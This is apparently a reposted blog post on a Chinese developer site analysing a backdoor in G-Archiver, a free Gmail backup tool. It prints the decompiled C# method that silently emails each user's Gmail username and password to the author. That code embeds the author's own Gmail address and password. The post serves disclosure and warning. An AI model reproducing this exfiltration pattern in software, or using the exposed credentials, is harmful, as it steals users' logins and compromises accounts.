Backdoor in G-Archiver

最新推荐文章于 2024-10-24 20:18:31 发布

原创最新推荐文章于 2024-10-24 20:18:31 发布 · 681 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#credentials #gmail #exception #string #download #internet

一名程序员在检查一款名为G-Archiver的免费Gmail备份工具时发现，该程序不仅内置了作者的Gmail登录凭证，还在悄悄收集并发送用户的Gmail登录信息。这一行为揭示了一个未经用户同意的信息泄露案例。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Here is another data point that simple backdoors are being placed into free applications. A programmer, Dustin Brooks, was inspecting a free Gmail backup utility, called G-Archiver, with reflector and noticed that not only did it have the authors Gmail credentials baked in, but is was sending the Gmail credentials of every user of the program to the author.
This is an example of an unintended network activity backdoor where information leakage occurs. Here is the code:

public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add(”JTerry79@gmail.com”);
message.From = new MailAddress(”JTerry79@gmail.com”, “JTerry”, Encoding.UTF8);
message.Subject = “Account”;
message.SubjectEncoding = Encoding.UTF8;
message.Body = “Username: ” + a;
message.Body = message.Body + “/r/nPassword: ” + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential(”JTerry79@gmail.com”, “bilal482″);
client.Port = 0×24b;
client.Host = “smtp.gmail.com”;
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}

This obviously wasn’t the smartest backdoor. The writer didn’t need to use the same credentials for for his “drop” account to send the mail. That made it trivial for the investigator to verify what was going on. There was also no attempt at obfuscation.
As a internet community we don’t have a good way yet of dealing with these problems except to hope that someone will inspect the free software at some point, alert people, and then hope that all the people that downloaded the software get contacted so that they can change their Gmail credentials. With other stolen data there is no recourse.
We are stuck in a blacklist mentality for software. People readily download, install, or increasingly often with SaaS, just browse, and type in their credential. Unless users are stopped by a blacklist tool or service they end up taking an unknown risk.